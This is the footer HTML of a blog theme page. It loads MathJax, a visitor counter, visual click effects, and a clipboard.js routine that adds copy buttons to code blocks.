<script src="https://cdn.staticfile.org/mathjax/2.7.7/MathJax.js"></script>
<script src="https://cdn.staticfile.org/mathjax/2.7.7/config/TeX-AMS-MML_HTMLorMML-full.js"></script>
<script>
  var ayerConfig = {
    mathjax: true,
  };
</script>

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->
 
<script src="/js/clickBoom2.js"></script>
 
<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.staticfile.org/clipboard.js/2.0.10/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->
 
<script src="/js/dz.js"></script>
 
<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    

  </div>
</body>

</html>